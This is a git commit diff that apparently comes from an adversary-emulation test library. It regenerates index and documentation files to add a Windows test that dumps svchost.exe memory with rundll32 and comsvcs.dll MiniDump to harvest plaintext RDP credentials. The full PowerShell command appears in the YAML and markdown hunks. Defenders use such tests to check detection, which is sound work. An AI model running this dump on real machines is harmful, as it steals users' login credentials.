Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-07-14 17:14:29 +00:00
parent 1f82f6af1f
commit 4af8bae9f4
6 changed files with 62 additions and 0 deletions
@@ -55,6 +55,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
@@ -39,6 +39,7 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
@@ -91,6 +91,7 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
@@ -69,6 +69,7 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
@@ -4062,6 +4062,25 @@ credential-access:
          C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore"
        name: powershell
        elevation_required: true
+    - name: Dump svchost.exe to gather RDP credentials
+      auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
+      description: |
+        The svchost.exe contains the RDP plain-text credentials.
+        Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+        Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+          if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+          C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+        cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: true
  T1110.002:
    technique:
      external_references:
@@ -11,6 +11,8 @@ Several of the tools mentioned in associated sub-techniques may be used by both

 - [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)

+- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
+

 <br/>

@@ -133,4 +135,41 @@ Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f



+<br/>
+<br/>
+
+## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
+The svchost.exe contains the RDP plain-text credentials.
+Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
+
+Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
+if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>